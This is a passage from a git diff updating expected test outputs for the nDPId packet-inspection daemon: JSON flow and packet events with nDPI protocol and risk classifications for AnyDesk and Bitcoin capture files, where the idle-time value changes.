-01318{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1591342199201,"flow_last_seen":1591342199366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1591342199366,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01377{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1563,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} -01580{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2863,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=AnyNet Root CA, O=philandro Software GmbH, C=DE","subjectDN":"C=DE, O=philandro Software GmbH, CN=AnyNet Relay","fingerprint":"9E:08:D2:58:A9:02:CD:4F:E2:4A:26:B8:48:5C:43:0B:81:29:99:E3"}} -00810{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"2":"Match by IP"},"proto":"HTTP.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"http": {}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01201{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6943,"flow_first_seen":1591342199201,"flow_last_seen":1591342255171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2417415,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342198821,"flow_last_seen":1591342198821,"flow_idle_time":7560000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1591342198821,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591342198821,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1591342198821,"pkt":"AFBW5dKtAAwplUdeCABFAABbtopAAEAGCwXAqJWBM1PvkI3\/AFB7i54qMVwSUlAY+DR5WwAAFwMDAC7mz9mv7V5op8uDzrVlyYzGPOa22i4SIRv\/ctzVUMWyqJzhwIdSdK\/Qd7DJrcKc"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1591342198821,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1591342198821,"pkt":"AAwplUdeAFBW5dKtCABFAAAoe1AAAIAGRnIzU++QwKiVgQBQjf8xXBJSe4ueXVAQ+vBP7wAAAAAAAAAA"} +00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1591342198998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1591342198998,"pkt":"AFBW5dKtAAwplUdeCABFAABYtotAAEAGCwfAqJWBM1PvkI3\/AFB7i55dMVwSUlAY+DR5WAAAFwMDACvmz9mv7V5oqHbrZghdQbdzwBFFDzsTJ43BfdwI8acT8HfThIVfMXtYD9Ln"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342199201,"flow_last_seen":1591342199201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1591342199201,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1591342199201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1591342199201,"pkt":"AFBW5dKtAAwplUdeCABFAAA8CJBAAEAGudPAqJWBM1Pu26oPAFApppzyAAAAAKAC+vB4hwAAAgQFtAQCCAqukMx3AAAAAAEDAwc="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1591342199366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1591342199366,"pkt":"AAwplUdeAFBW5dKtCABFAAAse1UAAIAGRx4zU+7bwKiVgQBQqg9odWR8Kaac82AS+vDm4QAAAgQFtAAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1591342199366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1591342199366,"pkt":"AFBW5dKtAAwplUdeCABFAAAoCJFAAEAGuebAqJWBM1Pu26oPAFApppzzaHVkfVAQ+vB4cwAA"} +01318{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1591342199201,"flow_last_seen":1591342199366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1591342199366,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01377{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1563,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} +01580{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2863,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=AnyNet Root CA, O=philandro Software GmbH, C=DE","subjectDN":"C=DE, O=philandro Software GmbH, CN=AnyNet Relay","fingerprint":"9E:08:D2:58:A9:02:CD:4F:E2:4A:26:B8:48:5C:43:0B:81:29:99:E3"}} +00810{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"2":"Match by IP"},"proto":"HTTP.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"http": {}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01201{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6943,"flow_first_seen":1591342199201,"flow_last_seen":1591342255171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2417415,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","packets-captured":6963,"packets-processed":6963,"total-skipped-flows":0,"total-l4-data-len":2418022,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":1591342255171} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6963/6963 diff --git a/test/results/bitcoin.pcap.out b/test/results/bitcoin.pcap.out index fe65792f0..b03afa08d 100644 --- a/test/results/bitcoin.pcap.out +++ b/test/results/bitcoin.pcap.out @@ -1,44 +1,44 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bitcoin.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1301327937725} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1301327937725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937725,"pkt":"ACPrIpS0ACNshovhCABFAACdb3BAAEAGdmXAqAGOvKXVqdgVII1UFpaF9ORId4AY\/\/\/XwQAAAQEICicy22Mwkrss+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABBsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/vKXVqSCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/AqAGOII3ZMDrPGxAeDAD6vQEA"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1301327937800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937800,"pkt":"ACNshovhACPrIpS0CABFAACd8zJAADQG\/qK8pdWpwKgBjiCN2BX05Eh3VBaWhYAYAC7fMwAAAQEICjCSu0gnMttj+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABqsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtgVAQAAAAAAAAAAAAAAAAAAAAAA\/\/+8pdWpII1MLcnArv8XlgAGwwEA"} -01828{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1301327937931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1067,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1067,"pkt_l4_len":1033,"thread_ts_msec":1301327937931,"pkt":"ACPrIpS0ACNshovhCABFAAQdZEVAAEAGfhDAqAGOvKXVqdgVII1UFpbu9ORI4IAY\/\/\/JGQAAAQEICicy22UwkrtL+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZZ2V0YmxvY2tzAAAApQMAAGlfIuqcfAAAHKh7ybVTxuZIQjrl7yTcgS++hNhBt1zq9NegAAAAAAAA0isW7TPLR9+QJv0A5WbZVCvm695mFYsw+RcAAAAAAAAKtKqLikjG018uz8LfLAtdjFIkeP\/i1erq1gAAAAAAAJBdQRxOhTejsSgFAkOe4jLdh+MgkNThEJ18AAAAAAAAuqLvaBfSt3u\/xIqIdA14a1vMRWgufw\/9NSQAAAAAAABmO+ZaHQMV8GVsd2tLL4rFQTc0+9Vfwkt\/KAAAAAAAAJT+LTuh4xfC31zGm\/GrV7uiO60OaIRMkzcNAAAAAAAAuhdRV0aXd6Zg2v\/d1GRW41CXeTNnyZ2lADQAAAAAAADN6C3MlB3uxd0izHdkP3dhS0au0yU7AWAQZwAAAAAAAL+B7POHga71M99A8Eu3CYdV7ruvTTFqTRaEAAAAAAAA3UsnAThWfVMwqZa+fYK\/+mnwaocTsbQIG1kAAAAAAADey3zxujtbDGk\/QTgO92YcU4PswnA6nOZ6FgAAAAAAAMDzxV+Dq1G5LChOJMi\/klliIw7dOCRLUwU1AAAAAAAAPos8A4n6clF7nKE4hFivm22s790lzTk\/xUsAAAAAAAC0sS5A1Mm4fwV3yc3Q1LndsofGdqv023cDhAAAAAAAAGvuGwU2Et\/fX33Zfbvd3fo\/8TaDBcaUcU3CAAAAAAAAP2JWK5H+eMf+Pv\/jSxNvOoqfqtxRlUdLIhEAAAAAAADJveYZh3372qwQQlL9GVXITa9jJ6DXXZhGDQAAAAAAAKMYV6DpTz6VcKhTn2GDUxJn1w6c\/OztngqRAAAAAAAABDCPkjdagfw0FOqHQEeRGYOTGUOY4U7Z+TMAAAAAAABH73UkZZo8i3KUfaLV4BIT5FRuJgLU9+S6PwAAAAAAAEhKQKlsPJI3JIw8Tb+HHwelgYW13heoG+NwAAAAAAAAGoeNNbO0PKw7FoNOsSIzS8W\/U8wXt9nuho8AAAAAAADVlxLK6O44NewFXywS+BNdzYycb7g7WSY\/qQEAAAAAAKqI+qWcSpEbTrldQNWUJik+3hdENRtaz0ynBAAAAAAA\/6kPGMjbu4hU+GZN83C9X6Hc1si6bqd\/l3UhAAAAAABKw0jIrFFXJp9oPx6NizqHl5jwjXfMij2VrHIgAAAAAG\/ijAq28bNywaaiRq5j90+THoNl4VoInGjWGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1301328089970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328089970,"pkt":"ACPrIpS0ACNshovhCABFAACdrppAAEAGTZrAqAGORXY2etggII0QKtRyRVLzIYAY\/\/\/YagAAAQEICicy4VQAPPkD+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/RXY2eiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII3pIMJ+i724nwBQvgEA"} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 